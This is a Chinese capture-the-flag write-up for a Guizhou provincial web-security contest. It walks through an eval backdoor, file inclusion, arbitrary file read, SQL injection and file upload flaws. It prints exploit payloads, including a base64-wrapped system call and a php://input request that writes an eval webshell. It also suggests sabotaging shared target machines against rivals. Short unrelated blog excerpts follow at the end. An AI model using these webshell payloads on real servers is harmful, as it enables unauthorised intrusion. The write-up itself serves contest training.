貴州省網路安全知識競賽個人賽Writeup

2022-05-04 04:06:12 字數 2024 閱讀 5285

首先拖到d盾掃瞄

可以很明顯的看出來確實就是兩個後門

0x01 index.php#一句話木馬後門

0x02 about.php#檔案包含漏洞

都可以很直觀的看出來非常明顯的漏洞,第乙個直接就是

eval

一句話後門,第二個就是非常簡單的檔案包含;

第乙個漏洞的利用**即為:system(base64_decode("y2f0igzsywcq"));

y2f0igzsywcq是cat flag*進行

base64

編碼以後的。

第二個漏洞攻擊可以通過偽協議中的input寫入

webshell

about.php?f=php://input

post資料為:

<?php fputs(fopen("shell.php","w"),'<?php eval($_post["cmd"];?>');?>

0x03 challege.php#任意檔案讀取

這裡在41行的時候有乙個判斷,如果其中乙個滿足那麼就會

exit

。所以我們不能讓她

exit

,否則不能執行

readfile

40行的函式使用的有點問題,應該是

parse_url

,多了乙個

n,提供**給我的這位師傅應該是沒有修改過**的。所以這裡應該是比賽方的乙個瑕疵。

我們當作parse_url來做

parse_url函式是拿來解析

url的,如下所示

所以在看41行的**就很簡單了

我們直接讓$parts['host']不為空並且等於

localhost

即可最終得出讀取 flag:

0x04 sql注入

因為我這裡沒有資料庫環境就不多演示如何get資料了。

如果要修復,直接對$_get[『id』]進行操作即可。

0x05 sql注入

0x06 sql注入

0x07 upload.php#任意檔案上傳

上傳成功:/images/15681026431.php 

登陸後flag:(因為我這兒僅有原始碼,所以沒顯示出正確的flag,比賽環境裡在這裡應該是可以看到flag的)

0x08 sql注入 #search.php

小結:開啟index.php就可以很明顯的看到

eval

以及undefined index

:123

這裡其實就基本可以猜得到,

123這個引數是後門了。所以可以很快通過這個後門直接

getshell

拿到許可權;

上面的注入均沒有進行任何過濾,直接通過sqlmap就可以很簡單的跑出來;

拿到許可權以後,可以對**進行審計,迅速修復漏洞不讓對手入侵下這個**;

或者利用指令碼輪訓刪除images目錄下的檔案;

針對個人賽,入侵公共靶機的話,如果是可以修改**那麼就破壞功能點,如果不能修改**那就可以預先準備好一些小指令碼,例如輪訓刪除images目錄下的所有檔案。盡可能的達到自己入侵下的靶機就不要給別人入侵的機會;

網路安全知識競賽選擇題 161 200題

161.公共資訊網路安全監察工作的一般原則 abcd a 預防與打擊相結合的原則 b 專門機關監管與社會力量相結合的原則 c 糾正與制裁相結合的原則 d 教育和處罰相結合的原則 162.安全員應具備的條件 abd a 具有一定的計算機網路專業技術知識 b 經過計算機安全員培訓,並考試合格 c 具有大...

網路安全知識(一)

計算機病毒的破壞行為 計算機病毒的破壞行為主要分為四類 1 刪除 修改檔案。被開啟檔案變為乙個可執行檔案,原檔案內容被覆蓋。2 占用系統資源。絕大多數的蠕蟲病毒。瘋狂在計算機網路中傳播,占用網路以及本地計算機資源。3 非法訪問系統程序。主要以黑客病毒為主。通過感染計算機,然後黑客或非法使用者獲得對已...

網路安全基礎知識

什麼是網路安全?網路安全基礎知識有那些?網路安全問題隨著計算機技術的迅速發展日益突出,從網路執行和管理者角度說,他們希望對本地網路資訊的訪問 讀寫等操作受到保護和控制,避免出現 陷門 病毒 非法訪問 拒絕服務和網路資源非法占用和非法控制等威脅,制止和防禦網路黑客的攻擊。對安全保密部門來說,他們希望對...